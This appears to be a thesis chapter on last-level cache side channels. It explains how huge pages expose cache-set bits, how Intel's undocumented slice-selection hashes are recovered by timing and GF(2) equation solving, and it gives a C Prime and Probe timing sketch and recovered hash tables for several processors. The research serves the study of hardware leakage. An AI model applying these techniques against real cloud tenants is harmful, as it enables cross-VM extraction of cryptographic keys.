Indeed, if the page size is p bytes, the lower log2(p) bits of the virtual address are considered the page offset, while the rest are considered the page frame number (PFN). Only the PFN is processed by the MMU and needs to be translated from virtual to physical page number. The page offset remains untouched and has the same value in both the physical and the virtual address. Thus, the user still knows some bits of the physical address. Modern processors usually work with 4 KB pages and 48 bit virtual addresses, yielding a 12 bit offset and the remaining bits as virtual page number. In order to avoid the latency of virtual to physical address translation, modern architectures include a Translation Lookaside Buffer (TLB) that holds the most recently translated addresses. The TLB acts like a small cache that is checked prior to the MMU. One way to avoid TLB misses for large data processes is to increase the page size so that the memory is divided into fewer pages [CJ06, Inte, WW09]. Since the possible virtual to physical translation tags are significantly reduced, the CPU will observe fewer TLB misses than with 4 KB pages. This is the reason why most modern processors include the possibility to use huge size pages, which typically have a size of at least 1 MB. This feature is particularly effective in virtualized settings, where virtual machines are typically rented to offload the intensive hardware resource consumption from the customers' private computers. In fact, most well known VMMs support the usage of huge size pages by guest OSs to improve the performance of those heavy load processes [VMwc, KVM, Xenb]. Cache Addressing: Caches are physically tagged, i.e., the physical address is used to decide the position that the data is going to occupy in the cache.
With b-byte cache lines and m-way set associative caches with n sets, the lower log2(b) bits of the physical address are used to index the byte within a cache line, while the following log2(n) bits select the set that the memory line is mapped to in the cache. A graphical example of the procedure carried out to address the data in the cache can be seen in Figure 6.2. Recall that if a page size of 4 KB is used, the offset field is 12 bits long. If log2(n) + log2(b) is not bigger than 12, the set that a cache line is going to occupy can be addressed by the offset. In this case we say that the cache is virtually addressed, since the position occupied by a cache line can be determined by the virtual address. In contrast, if more than 12 bits are needed to address the corresponding set, we say that the cache is physically addressed, since only the physical address can determine the location of a cache line. Note that when huge size pages are used, the offset field is longer, and therefore bigger caches can be virtually addressed. As we will see, this information can be used to mount a cross-VM attack on the L3 cache in deduplication free systems. Note that this information was not necessary for Flush and Reload and Invalidate and Transfer, as we assumed that we shared ownership of the attacked memory blocks with the victim.

6.2 Last Level Cache Slices

Recent SMP microarchitectures divide the LLC into slices with the purpose of reducing the bandwidth bottlenecks when more than one core attempts to retrieve data from the LLC at the same time. The number of slices that the LLC is divided into usually matches the number of physical cores. For instance, a processor with s cores divides the LLC into s slices, decreasing the probability of resource conflict while accessing it. However, each core is still able to access the whole LLC, i.e., each core can access every slice.
Since the data will be spread over s "smaller caches", it is less likely that two cores will try to access the same slice at the same time. In fact, if each slice can support one access per cycle, the LLC does not introduce a bottleneck on the data throughput as long as each processor issues no more than one access per cycle. The slice that a memory block is going to occupy directly depends on its physical address and a non-public hash function, as in Figure 6.1.

Figure 6.1: A hash function based on the physical address decides whether the memory block belongs to slice 0 or 1.

Performance optimization of sliced caches has received a lot of attention in the past few years. In 2006, Cho et al. [CJ06] analyzed a distributed management approach for sliced L2 caches through OS page allocation. In 2007, Zhao et al. [ZIUN08] described a design for LLCs where part of the slice allocates core-private data. Cho et al. [JC07] describe a two-dimensional page coloring method to improve access latencies and miss rates in sliced caches. Similarly, Tam et al. [TASS07] also proposed an OS based method for partitioning the cache to avoid cache contention. In 2010 Hardavellas et al. [HFFA10] proposed an optimized cache block placement for caches divided into slices. Srikantaiah et al. [SKZ+11] presented a new adaptive multilevel cache hierarchy utilizing cache slices for L2 and L3 caches. In 2013 Chen et al. [CCC+13] detail the approach that Intel is planning to take for their next generation processors. The paper shows that the slices will be workload dependent and that some of them might be dynamically switched off for power saving. In 2014 Kurian et al. [KDK14b] proposed a data replication protocol in the LLC slices. Ye et al. [YWCL14] studied a cache partitioning system treating each slice as an independent smaller cache.
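For illustration, in the processors where this function has been reverse engineered (see the next section), the slice-index bits turn out to be XORs of subsets of physical address bits. A hypothetical two-slice function of that shape, with a made-up bit mask:

```c
#include <stdint.h>
#include <assert.h>

/* Hypothetical 2-slice selection function: one slice-index bit computed as
 * the XOR (parity) of a subset of physical address bits selected by mask.
 * The mask is illustrative only; real processors use undocumented masks.
 * __builtin_parityll is a GCC/Clang builtin. */
static inline unsigned slice_bit(uint64_t pa, uint64_t mask)
{
    return __builtin_parityll(pa & mask);
}
```

Note that a function of this shape is linear over XOR, which is what makes the equation-system approach described later in this section workable.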
However, only very little effort has been put into analyzing the hash function used for selecting the LLC slice. A detailed analysis of the cache performance in Nehalem processors is given in [MHSM09], without an explanation of cache slices. The LLC slices and interconnections in the Sandy Bridge microarchitecture are discussed in [Bri], but the slice selection algorithm is not provided. In [hen], a cache analysis of the Intel Ivy Bridge architecture is presented and cache slices are mentioned. However, the hash function describing the slice selection algorithm is again not described, although it is mentioned that many bits of the physical address are involved. Hund et al. [HWH13] were the only ones describing the slice selection algorithm for a specific processor, i.e., the i7-2600. They recover the slice selection algorithm by comparing Hamming distances of different physical addresses. This information was again not needed for Flush and Reload and Invalidate and Transfer, as we could evict a memory block from the cache with the clflush instruction in systems where deduplication is enabled.

Figure 6.2: Last level cache addressing methodology for Intel processors. Slices are selected by the tag, which is given by the MSBs of the physical address.

6.3 The Original Prime and Probe Technique

The new attack proposed in this work is based on the methodology of the known Prime and Probe technique. Prime and Probe is a cache-based side channel attack technique used in [OST06, ZJOR11, ZJRR12] that can be classified as an access driven cache attack. The spy process ascertains which of the sets in the cache have been accessed by a victim. The attack is carried out in 3 stages:

• Priming stage: In this stage, the attacker fills the monitored cache sets with his own cache lines. This is done by reading his own data.
• Victim accessing stage: In this stage the attacker waits for the victim to access some positions in the cache, causing the eviction of some of the cache lines that were primed in the first stage.

• Probing stage: In this stage the attacker accesses the priming data again. When the attacker reloads data from a set that has been used by the victim, some of the primed cache lines have been evicted, causing a higher probe time. However, if the victim did not use any of the cache lines in a monitored set, all the primed cache lines will still reside in the cache, causing a low probe time.

6.4 Limitations of the Original Prime and Probe Technique

The original Prime and Probe technique was successfully applied to L1 caches to recover cryptographic keys. It is therefore an open question why, with multi-core systems and shared LLCs, no prior work has applied it to the LLC to recover information across cores. Here we summarize the three main problems of taking the Prime and Probe attack to the LLC:

• The L1 Prime and Probe attack fills the whole L1 cache with the attacker's data. As the LLC is usually at least two orders of magnitude bigger than the L1, filling the entire LLC does not seem a realistic approach.

• As memory pages are usually 4 KB and the page offset remains untouched by the virtual address translation, the attacker gains enough bits of information to fully know the location of a memory block in the L1. However, as the LLC has more sets, the attacker is unable to predict the set that his memory addresses will occupy.

• The LLC in Intel processors, as previously described, is divided into slices since the release of the Sandy Bridge architecture. The slice that a memory block occupies is decided by an undocumented hash algorithm. Thus, an attacker willing to fill one of the sets in the LLC might observe how his addresses get distributed across several slices and fail to fill the set.
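For reference, the three-stage round of Section 6.3 can be sketched in C as follows. `ev[]` is an eviction set of addresses mapping to the monitored set; building such a set for the sliced LLC is exactly what the challenges above make difficult, and the hit/miss threshold on the returned time is machine dependent.

```c
#include <stdint.h>
#include <assert.h>
#include <x86intrin.h>  /* __rdtsc, _mm_mfence (x86 GCC/Clang) */

/* One Prime and Probe round over a single monitored set, following the
 * three stages of Section 6.3. Returns the probe time in cycles: a high
 * value means the victim evicted some of our primed lines, i.e., it
 * touched the monitored set. */
static uint64_t prime_probe(volatile uint8_t **ev, int ways,
                            void (*victim)(void))
{
    for (int i = 0; i < ways; i++)    /* priming stage: fill the set */
        (void)*ev[i];
    if (victim)                       /* victim accessing stage */
        victim();
    _mm_mfence();
    uint64_t t0 = __rdtsc();
    for (int i = 0; i < ways; i++)    /* probing stage: reload our lines */
        (void)*ev[i];
    _mm_mfence();
    return __rdtsc() - t0;
}
```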
In the following sections we solve the aforementioned challenges to successfully apply the Prime and Probe attack in the LLC.

6.5 Targeting Small Pieces of the LLC

The first obstacle when executing the original Prime and Probe attack in the LLC is the vast number of memory addresses needed to fill it. Instead, we will only target smaller pieces of it that will give us enough information about the secret process being executed by a victim. Recall Algorithm 2 from Section 2.4.2. The modular exponentiation leaked information due to the usage of the multiplication function when a "1" bit was found. Instead of filling the entire cache, we can just perform the Prime and Probe attack in the LLC set where the multiplication function resides. This gives us enough information about when the multiplication function is used, and therefore when the victim is processing a "1" or a "0" bit. We will cover in future sections how to know where this multiplication function resides.

6.6 LLC Set Location Information Enabled by Huge Pages

The second obstacle that the original Prime and Probe attack encounters when targeting the LLC is that the set occupied by the attacker's memory blocks is unknown, due to the lack of control over the physical address bits. The LLC Prime and Probe attack proposed in this work is enabled by making use of huge pages, thereby eliminating a major obstacle that normally restricts the Prime and Probe attack to the L1 cache. As explained in Section 6.1, a user does not use the physical memory directly, but is assigned a virtual memory, so that a translation from virtual to physical memory is performed at the hardware level. The address translation step creates an additional challenge for the attacker, since the real addresses of the variables of the target process are unknown to him.
Figure 6.3: Regular page (4 KB, top) and huge page (2 MB, bottom) virtual to physical address mapping for an Intel x86 processor. For huge pages, all L3 cache sets become transparently accessible even with virtual addressing.

However, this translation is only performed on some of the higher order bits of the virtual address, while a lower portion, named the offset, remains untouched. Since caches are addressed by the physical address, if we have a cache line size of b bytes, the lower log2(b) bits of the address will be used to resolve the corresponding byte in the cache line. Furthermore, if the cache is set-associative and, for instance, divided into n sets, then the next log2(n) bits of the address will select the set that each memory datum is going to occupy in the cache. The log2(b) bits that form the byte address within a cache line are contained within the offset field. However, depending on the cache size, the following field, which contains the set address, may exceed the offset boundary. The offsets allow addressing within a memory page. The OS's Memory Management Unit (MMU) keeps track of which page belongs to which process. The page size can be adjusted to better match the needs of the application. Smaller pages require more time for the MMU to resolve. Here we focus on the default 4 KB page size and the larger page sizes provided under the common name of huge pages. As we shall see, the choice of page size makes a significant difference in the attacker's ability to carry out a successful attack on a particular cache level:

• 4 KB pages: For 4 KB pages, the lower 12-bit offset of the virtual address is not translated, while the remaining bits are forwarded to the Memory Management Unit. In modern processors the memory line size is usually set at 64 bytes. This leaves 6 bits untouched by the Memory Management Unit while translating regular pages.
As shown in the top of Figure 6.3, the page offset is known to the attacker. Therefore, the attacker knows the 6-bit byte address plus 6 additional bits, which can only resolve accesses to small caches (64 sets at most). This is the main reason why techniques such as Prime and Probe have only targeted the L1 cache, since it is the only one permitting the attacker full control of the bits resolving the set. Therefore, the small page size indirectly prevents attacks targeting bigger caches like the L2 and L3.

• Huge pages: The scenario is different if we work with huge size pages. Typical huge page sizes are 1 MB or even greater. This means that the offset field in the page translation process is bigger, with 21 bits or more remaining untouched during page translation. Observe the example presented in Figure 6.3. For instance, assume that our computer has 3 levels of cache, with the last one shared, and that 64, 512 and 2048 are the numbers of sets the L1, L2 and L3 caches are divided into, respectively. The lowest 6 bits of the offset are used for addressing the 64 byte long cache lines. The following 6 bits are used to resolve the set addresses in the L1 cache. For the L2 and L3 caches this field is 9 and 11 bits wide, respectively. In this case, a huge page size of 2 MB (21 bit offset) will give the attacker full control of the set occupied by his data in all three levels of cache, i.e., the L1, L2 and L3 caches. The significance of targeting the last level cache becomes apparent when one considers the access time gap between the last level cache and the memory, which is much more pronounced than the access time difference between the L1 and L2 caches. Therefore, using huge pages makes it possible to mount a higher resolution Prime and Probe style attack.
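The bit arithmetic behind the two cases above can be sketched as follows (page size, b and n are powers of two; the `virtually_addressed` check is the log2(n) + log2(b) ≤ offset-bits condition restated):

```c
#include <stdint.h>
#include <assert.h>

/* Page-offset bits survive virtual-to-physical translation unchanged. */
static inline uint64_t page_offset(uint64_t va, uint64_t page) { return va & (page - 1); }

/* With b-byte lines and n sets: the low log2(b) bits index the byte in
 * the line, the next log2(n) bits select the set. */
static inline uint64_t line_byte(uint64_t pa, uint64_t b)             { return pa & (b - 1); }
static inline uint64_t cache_set(uint64_t pa, uint64_t b, uint64_t n) { return (pa / b) & (n - 1); }

/* The cache is virtually addressed iff log2(n) + log2(b) bits fit in the
 * untranslated page offset, i.e., b * n <= page size. */
static inline int virtually_addressed(uint64_t page, uint64_t b, uint64_t n)
{
    return b * n <= page;
}
```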
6.7 Reverse Engineering the Slice Selection Algorithm

The last inconvenience that we observe when executing Prime and Probe in the LLC is the fact that the LLC is divided into slices, whose assignment is decided by an undocumented hash function. This means that the attacker cannot control which slice is targeted. Although knowing the slice selection algorithm is not crucial to run a Prime and Probe attack (since we could calculate the eviction set for every set that we want to monitor), knowledge of the slice selection algorithm can save significant time, especially when we have to profile a large number of sets. Indeed, in the attack step, we can select a range of sets/slices s1, s2, ..., sn for which, thanks to the knowledge of the slice selection algorithm, we know that the memory blocks in the eviction set will not change.

This section describes the methodology applied to reverse engineer the slice selection algorithm for specific Intel processors. Note that the method can be used to reverse engineer slice selection algorithms for other Intel processors that have not been analyzed in this work. To the best of our knowledge, this slice selection hash function is not public. We solve the issue by:

• Generating data blocks at slice-colliding addresses to fill a specific set. Access timings are used to determine which data is stored in the same slice.

• Using the addresses of data blocks identified to be co-residing in slices to generate a system of equations. The resulting equation systems can then be solved to identify the slice selection algorithm implemented by the processor.

• Building a scalable tool, i.e., proving its applicability for a wide range of different architectures.

6.7.1 Probing the Last Level Cache

As stated in Section 6.2, the shared last level caches in SMP multicore architectures are usually divided into slices, with an unknown hash function determining the slice.
In order to reverse engineer this hash function, we need to recover addresses of data blocks co-residing in a set of a specific slice. The set where a data block is placed can be controlled, even in the presence of virtual addressing, if huge pages are used. Recall that by using 2 MB huge pages we gain control over the least significant 21 bits of the physical address, thereby controlling the set in which our blocks of data will reside. Once we have control over the set a data block is placed in, we can try to detect data blocks co-residing in the same slice. Co-residency can be inferred by distinguishing LLC accesses from memory accesses.

6.7.2 Identifying m Data Blocks Co-Residing in a Slice

We need to identify the m memory blocks that fill each one of the slices for a specific set. Note that we still do not know the memory blocks that collide in a specific set. In order to achieve this goal we perform the following steps:

• Step 1: Access one memory block b0 in a set in the LLC.

• Step 2: Access several additional memory blocks b1, b2, ..., bn that reside in the same set, but may reside in a different slice, in order to fill the slice where b0 resides.

• Step 3: Reload the memory block b0 to check whether it still resides in the last level cache or in memory. A high reload time indicates that the memory block b0 has been evicted from the slice, since Intel utilizes a Pseudo Least Recently Used (PLRU) cache eviction algorithm. Therefore we know that the m memory blocks required to evict b0 from the slice are among the accessed additional memory blocks b1, b2, ..., bn.

Figure 6.4: Generating additional memory blocks until a high reload value is observed, i.e., the monitored block is evicted from the LLC. The experiments were performed on an Intel i5-3320M.

• Step 4: Subtract one of the accessed additional memory blocks bi and repeat the protocol.
If b0 still resides in memory (high reload time), bi does not reside in the same slice. If b0 resides in the cache, it can be concluded that bi resides in the same cache slice as b0.

Steps 2 and 3 can be seen graphically in Figure 6.4, where additional memory blocks are generated until a high reload time is observed, indicating that the monitored block b0 was evicted from the LLC after memory block b26 was accessed. Step 4 is presented graphically in Figure 6.5, where each additional block is checked to see whether it affects the reload time observed in Figure 6.4. If the reload time remains high when one of the blocks bi is no longer accessed, bi does not reside in the same slice as the monitored block b0. In our particular case, we observe that the slice-colliding blocks are b3, b4, b7, b9, b10, b13, b14, b17, b18, b21, b22 and b24.

6.7.3 Generating Equations Mapping the Slices

Once m memory blocks that fill one of the cache slices have been identified, we generate additional blocks that reside in the same slice to be able to generate more equations. The approach is similar to the previous one:

• Access the m memory blocks b0, b1, ..., bm that fill one slice in a set in the LLC.

Figure 6.5: Subtracting memory blocks to identify the m blocks mapping to one slice on an Intel i5-3320M. Low reload values indicate that the line occupies the same slice as the monitored data.

• Access, one at a time, additional memory blocks that reside in the same set, but may reside in a different slice.

• Reload the memory block b0 to check whether it still resides in the LLC or in memory. Again, due to the PLRU algorithm, a high reload time indicates that b0 has been evicted from the slice. Hence, the additional memory block also resides in the same cache slice.
• Once a sufficiently large group of memory blocks that occupy the same LLC slice has been identified, we obtain their physical addresses to construct a matrix Pi of equations, where each row is one of the physical addresses mapping to the monitored slice.

The equation generation stage can be observed in Figure 6.6, where 4000 additional memory blocks occupying the same set were generated. Knowing the m blocks that fill one slice, accessing an additional memory block will output a higher reload value if it resides in the same slice as b0 (since it evicts b0 from the cache).

Handling Noise: We choose a detection threshold in such a way that we most likely only deal with false negatives, which do not affect the correctness of the solutions of the equation system. As can be observed in Figure 6.6, there are still a few values that are not clearly identified (i.e., those with reload values of 10-11 cycles). By simply not considering these, false positives are avoided and the resulting equation system remains correct.

Figure 6.6: Generating equations mapping one slice for 4000 memory blocks on an Intel i5-3320M. High reload values indicate that the line occupies the same slice as the monitored data.

6.7.4 Recovering Linear Hash Functions

The mapping of a memory block to a specific slice in the LLC is based on its physical address. A hash function H(p) takes the physical address p as input and returns the slice the address is mapped to. We know that H maps all possible p to s outputs, where s is the number of slices for the processor:

H : {0,1}^⌈log2 p⌉ → {0,1}^⌈log2 s⌉

The labeling of these outputs is arbitrary. However, each output should occur with roughly equal likelihood, so that accesses are balanced over the slices. We model H as a function of the address bits. In fact, as we will see, the observed hash functions are linear in the address bits pi.
In such a case we can model H as a concatenation of linear Boolean functions H(p) = H0(p) ∥ ... ∥ H_⌈log2 s⌉−1(p), where ∥ denotes concatenation. Then, Hi is given as

Hi(p) = hi,0 p0 + hi,1 p1 + ... + hi,l pl = Σ_{j=0}^{l} hi,j pj.

Here, hi,j ∈ {0,1} is a coefficient and pj is a physical address bit. The steps in the previous subsections provide addresses p mapped to a specific slice, which are combined in a matrix Pi, where each row is a physical address p. The goal is to recover the functions Hi, given as the coefficients hi,j. In general, for linear systems, the Hi can be determined by solving the equations

Pi · Ĥi = 0̂,  (6.1)
Pi · Ĥi = 1̂,  (6.2)

where Ĥi = (hi,0, hi,1, ..., hi,l)^T is a vector containing all coefficients of Hi. The right hand side is the ith bit of the representation of the respective slice, where 0̂ and 1̂ are the all-zeros and all-ones vectors, respectively. Note that finding a solution to Equation (6.1) is equivalent to finding the kernel (null space) of the matrix Pi. Also note that any linear combination of the vectors in the kernel is also a solution to Equation (6.1), and the sum of a particular solution to Equation (6.2) and any vector in the kernel is also a particular solution to Equation (6.2). In general:

ĥ ∈ ker Pi ⟺ Pi · ĥ = 0̂
∀ ĥ1, ĥ2 ∈ ker Pi : ĥ1 + ĥ2 ∈ ker Pi
∀ ĥ1, ĥ2 with Pi · ĥ1 = 1̂, ĥ2 ∈ ker Pi : Pi · (ĥ1 + ĥ2) = 1̂

Recall that each equation system should map to x = ⌈log2(s)⌉ bit selection functions Hi. Also note that we cannot infer the labeling of the slices, although the equation system mapping to slice 0 will never output a solution to Equation (6.2). This means that there is more than one possible solution, all of them valid, if the number of slices is greater than 2. In this case, (2^x − 1 choose x) solutions will satisfy Equation (6.1). However, any combination of x solutions is valid, differing only in the label referring to each slice. We have only considered linear systems in our explanation.
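Solving Equation (6.1) is a small exercise in Boolean linear algebra. The sketch below (pure Python, not the authors' tool) computes a kernel basis over GF(2) and, in a hypothetical 3-bit example, recovers the coefficients of a toy hash h(p) = p0 ⊕ p2 from addresses assumed to map to slice 0.

```python
def gf2_kernel(P, ncols):
    """Basis of {h : P·h = 0 over GF(2)}; rows of P are bit-lists."""
    rows = [sum(bit << j for j, bit in enumerate(r)) for r in P]
    pivots = {}  # pivot column -> fully reduced row (as an int bitmask)
    for r in rows:
        for c, pr in pivots.items():          # reduce by existing pivots
            if (r >> c) & 1:
                r ^= pr
        if r:
            c = (r & -r).bit_length() - 1     # lowest set bit = new pivot
            for c2 in pivots:                 # keep all rows mutually reduced
                if (pivots[c2] >> c) & 1:
                    pivots[c2] ^= r
            pivots[c] = r
    basis = []
    for free in range(ncols):                 # one kernel vector per free column
        if free in pivots:
            continue
        v = 1 << free
        for c, pr in pivots.items():          # back-substitute pivot equations
            if (pr >> free) & 1:
                v |= 1 << c
        basis.append([(v >> j) & 1 for j in range(ncols)])
    return basis

# Toy example: 3-bit "addresses" all satisfying p0 ⊕ p2 = 0
P0 = [[1, 0, 1], [0, 1, 0], [1, 1, 1]]
assert gf2_kernel(P0, 3) == [[1, 0, 1]]   # recovered coefficients: p0 ⊕ p2
```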
If the system is non-linear (i.e., the number of slices is not a power of two), it needs to be re-linearized. This can be done by expanding the matrix Pi with the non-linear terms, Pi = [Pi_linear | Pi_nonlinear], and solving Equations (6.1) and (6.2). Note that the higher the degree of the non-linear terms, the more equations are required to solve the system. For that reason, later in Section 6.7.7 we present an example of an alternative (more intuitive) approach that can be taken to recover non-linear slice selection algorithms.

This tool can also be useful in cases where the user cannot determine the slice selection algorithm, e.g., due to too few derived equations. Indeed, the first step that this tool implements is generating the memory blocks that co-reside in each of the slices. This information can already be used to mount a side channel attack.

6.7.5 Experiment Setup for Linear Hash Functions

In this section we describe our experiment setup. In order to test the applicability of our tool, we implemented our slice selection algorithm recovery method on a wide range of different computer architectures. The architectures on which our tool was tested are listed in Table 6.1, together with the relevant parameters.

Table 6.1: Comparison of the profiled architectures

Processor | Architecture | LLC size | Associativity | Slices | Sets/slice
Intel i5-650 [i65] | Nehalem | 4 MB | 16 | 2 | 2048
Intel i5-3320M [inta] | Ivy Bridge | 3 MB | 12 | 2 | 2048
Intel i5-4200M [iM] | Haswell | 3 MB | 12 | 2 | 2048
Intel i7-4702M [i74] | Haswell | 6 MB | 12 | 4 | 2048
Intel Xeon E5-2609 v2 [intb] | Ivy Bridge | 10 MB | 20 | 4 | 2048
Intel Xeon E5-2640 v3 [intc] | Haswell | 20 MB | 20 | 8 | 2048

Our experiments cover a wide range of linear (power of two) slice counts as well as different architectures. All architectures except the Intel Xeon E5-2640 v3 were running Ubuntu 12.04 LTS as the operating system, whereas the last one used Ubuntu 14.04.
Ubuntu, in root mode, allows the usage of huge pages. The huge page size on all the processors is 2 MB [Lin]. We also use a tool to obtain the physical addresses of the variables used in our code by looking at the /proc/PID/pagemap file. In order to obtain the slice selection algorithm, we profiled a single set, i.e., set 0. However, on all the architectures profiled in this paper, we verified that the set did not affect the slice selection algorithm. This might not be true for all Intel processors.

The experiments cover a wide selection of architectures, ranging from Nehalem (released in 2008) to Haswell (released in 2013). The processors include laptop CPUs (i5-3320M, i5-4200M and i7-4702M), a desktop CPU (i5-650) and server CPUs (Xeon E5-2609 v2, Xeon E5-2640 v3), demonstrating the viability of our tool in a wide range of scenarios. As can be seen, in the entire set of processors that we analyzed, each slice gets 2048 sets in the L3 cache. Apparently, Intel designs all of its processors in such a way that every slice gets all 2048 sets of the LLC. Indeed, this is not surprising, since it allows the use of cache addressing mechanisms independent of the size or the number of cores present in the cache. This also means that 17 bits of the physical address are required to select the set in the last level cache, well within the 21 bits of freedom that we obtain with huge pages.

6.7.6 Results for Linear Hash Functions

Table 6.2 summarizes the slice selection algorithm for all the processors analyzed in this work.

The Intel i5-650 is the oldest processor that was analyzed. Indeed, the slice selection algorithm that it implements is much simpler than the rest, involving only a single bit to decide between the two slices. This bit is the 17th bit, i.e., the bit immediately following the last set-selection bit.
Table 6.2: Slice selection hash functions for the profiled architectures

Processor | Architecture | Solutions | Slice selection algorithm
Intel i7-2600 [HWH13] | Sandy Bridge | – | p18⊕p19⊕p21⊕p23⊕p25⊕p27⊕p29⊕p30⊕p31; p17⊕p19⊕p20⊕p21⊕p22⊕p23⊕p24⊕p26⊕p28⊕p29⊕p31
Intel i5-650 | Nehalem | 1 | p17
Intel i5-3320M | Ivy Bridge | 1 | p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32
Intel i5-4200M | Haswell | 1 | p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32
Intel i7-4702M | Haswell | 3 | p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32; p18⊕p19⊕p21⊕p23⊕p25⊕p27⊕p29⊕p30⊕p31⊕p32
Intel Xeon E5-2609 v2 | Ivy Bridge | 3 | p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32; p18⊕p19⊕p21⊕p23⊕p25⊕p27⊕p29⊕p30⊕p31⊕p32
Intel Xeon E5-2640 v3 | Haswell | 35 | p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32; p19⊕p22⊕p23⊕p26⊕p27⊕p30⊕p31; p17⊕p20⊕p21⊕p24⊕p27⊕p28⊕p29⊕p30

This means that an attacker using Prime and Probe techniques can fully control both slices, since all the bits are under his control.

It can be seen that the Intel i5-3320M and Intel i5-4200M processors implement a much more complicated slice selection algorithm than the previous one, evaluating many bits of the address in the hash function. Since both processors have 2 slices, our method outputs a single solution, i.e., a single vector in the kernel of the system of equations mapping to the zero slice. Note that, even though both processors have different microarchitectures and are from different generations, they implement the same slice selection algorithm.

We next focus on the 4-slice processors analyzed, i.e., the Intel i7-4702M and the Intel Xeon E5-2609 v2. Again, many upper bits are used by the hash function to select the slice. We obtain 3 kernel vectors for the system of equations mapping to the zero slice (two vectors and their linear combination). From the three solutions, any combination of two (one for h0 and one for h1) is a valid solution, i.e., the 4 different slices are represented.
However, the labeling of the slices is not known. Therefore, choosing a different solution combination will only affect the labeling of the non-zero slices, which is not important for the scope of the tool. It can also be observed that, even when we compare a high end server (Xeon E5-2609 v2) and a laptop (i7-4702M) with different architectures, the slice selection algorithm implemented by both of them is the same. Further note that one of the functions is equal to the one discussed for the two-slice architectures. We can therefore say that the hash function that selects the slice in the newer architectures depends only on the number of slices.

Finally, we focus on the Intel Xeon E5-2640 v3, which divides the last level cache into 8 slices. Note that this is a recent high end server, which might commonly be found in public cloud services. In this case, since 8 slices have to be addressed, we need 3 hash functions to map them. The procedure is the same as for the previous processors: we first identify the set of equations that maps to slice 0 (recall, this system never yields a solution to Equation (6.2)) by finding its kernel. The kernel gives us 3 possible vectors plus all their linear combinations. As before, any solution that takes a set of 3 vectors will be a valid solution for the equation system, differing only in the labeling of the slices. Note also that some of the solutions involve only a few bits of the physical address, making them suitable for side channel attacks.

In summary, we were able to obtain the slice selection hash functions in all cases. Our results show that the slice selection algorithm was simpler in the Nehalem architecture, while newer architectures like Ivy Bridge or Haswell use several bits of the physical address to select the slice. We also observed that the slice selection algorithm mostly depends on the number of slices present, regardless of the type of CPU analyzed (laptop or high end server).
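Once the coefficients are known, deciding which slice a physical address maps to is a parity computation over the involved bits. A minimal sketch (Python), using the function reported in Table 6.2 for the i5-3320M/i5-4200M as the example:

```python
# Bits involved in the i5-3320M / i5-4200M slice hash (Table 6.2)
BITS = [17, 18, 20, 22, 24, 25, 26, 27, 28, 30, 32]

def slice_bit(paddr):
    """Slice-selection bit: XOR (parity) of the involved address bits."""
    x = 0
    for b in BITS:
        x ^= (paddr >> b) & 1
    return x

assert slice_bit(0) == 0
assert slice_bit(1 << 17) == 1                 # one involved bit set
assert slice_bit((1 << 17) | (1 << 18)) == 0   # two involved bits cancel
assert slice_bit(1 << 16) == 0                 # set-field bits are ignored
```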
6.7.7 Obtaining Non-linear Slice Selection Algorithms

It is important to note that Prime and Probe attacks become much simpler when architectures with linear slice selection algorithms are targeted, because the memory blocks that form an eviction set do not change across set values. This means that we can calculate the eviction set for, e.g., set 0 and the memory blocks will be the same if we profile a different set s. As we will see in this section, this is not true for non-linear slice selection algorithms, where the profiled set also affects the slice selected.

As an example we utilize the Intel Xeon E5-2670 v2, the CPU behind the most widely used EC2 instance type, which has a 25 MB LLC distributed over 10 slices. By performing some small tests we can clearly observe that the set field affects the slice selection algorithm implemented by this processor. Indeed, it is also clearly observable that the implemented hash function is a non-linear function of the address bits, since the 16 memory blocks mapped to the same set within a huge memory page cannot be evenly distributed over 10 slices. Thus we describe the slice selection algorithm as

H(p) = h3(p) ∥ h2(p) ∥ h1(p) ∥ h0(p)  (6.3)

where H(p) is a concatenation of 4 different functions corresponding to the 4 bits necessary to represent 10 slices. Note that H(p) will output results from 0000 to 1001 if we label the slices 0-9. Thus, a non-linear function is needed that excludes outputs 10-15. Further note that p is the physical address and will be represented as a bit string: p = p0 p1 ... p35.

In order to recover the non-linear hash function implemented by the Intel Xeon E5-2670 v2, we performed experiments on a fully controlled machine featuring this processor. We first generate ten equation systems based on addresses colliding in the same slice, applying the same methodology explained in Section 6.7.4 and generating up to 100,000 additional memory blocks.
We repeat the same process 10 times, changing the primed memory block b0 each time to target a different slice. This outputs 10 different systems of addresses, each one referring to a different slice.

Figure 6.7: Number of addresses that each slice takes out of 100,000. The non-linear slices take fewer addresses than the linear ones.

The first important observation we made on the 10 different systems is that 8 of them behave differently from the remaining 2. In 8 of the recovered address systems, if 2 memory blocks in the same huge memory page collide in the same slice, they differ only in the 17th bit. This is not true for the remaining two address systems. We suspect, at this point, that the 2 systems behaving differently are the 8th and 9th slices. We will refer to these two slices as the non-linear slices.

Up to this point, one could solve the non-linear function after a re-linearization step, given sufficiently many equations. However, one may not be able to recover enough addresses. Recall that the higher the degree of the non-linear term, the more equations are needed. In order to keep our analysis simpler, we decided to take a different approach.

The second important observation we made is on the distribution of the addresses over the 10 slices. It turns out that the last two slices are mapped to by a lower number of addresses than the remaining 8 slices. Figure 6.7 shows the distribution of the 100,000 addresses over the 10 slices. The different distributions seen for the last two slices give us evidence that a non-linear slice selection function is implemented in the processor. Furthermore, it can be observed that the linear slices are mapped to by 81.25% of the addresses, while the non-linear slices get only about 18.75%, i.e., a proportion of 3/16. We will make use of this uneven distribution later.
We proceed to solve the first 8 slices and the last 2 slices separately using linear functions. For each we try to find solutions to Equations (6.1) and (6.2). This outputs two sets of linear solutions, one for the first 8 linear slices and one for the last 2 slices. Given that we can model the slice selection functions separately using linear functions, and given that the distribution is non-uniform, we suspect that the hash function is implemented in two levels. In the first level, a non-linear function chooses between either the 3 linear functions describing the 8 linear slices or the linear functions describing the 2 non-linear slices.

Table 6.3: Hash selection algorithm implemented by the Intel Xeon E5-2670 v2

Vector | Hash function H(p) = h0(p) ∥ ¬(nl(p))·h′1(p) ∥ ¬(nl(p))·h′2(p) ∥ nl(p)
h0 | p18⊕p19⊕p20⊕p22⊕p24⊕p25⊕p30⊕p32⊕p33⊕p34
h′1 | p18⊕p21⊕p22⊕p23⊕p24⊕p26⊕p30⊕p31⊕p32
h′2 | p19⊕p22⊕p23⊕p26⊕p28⊕p30
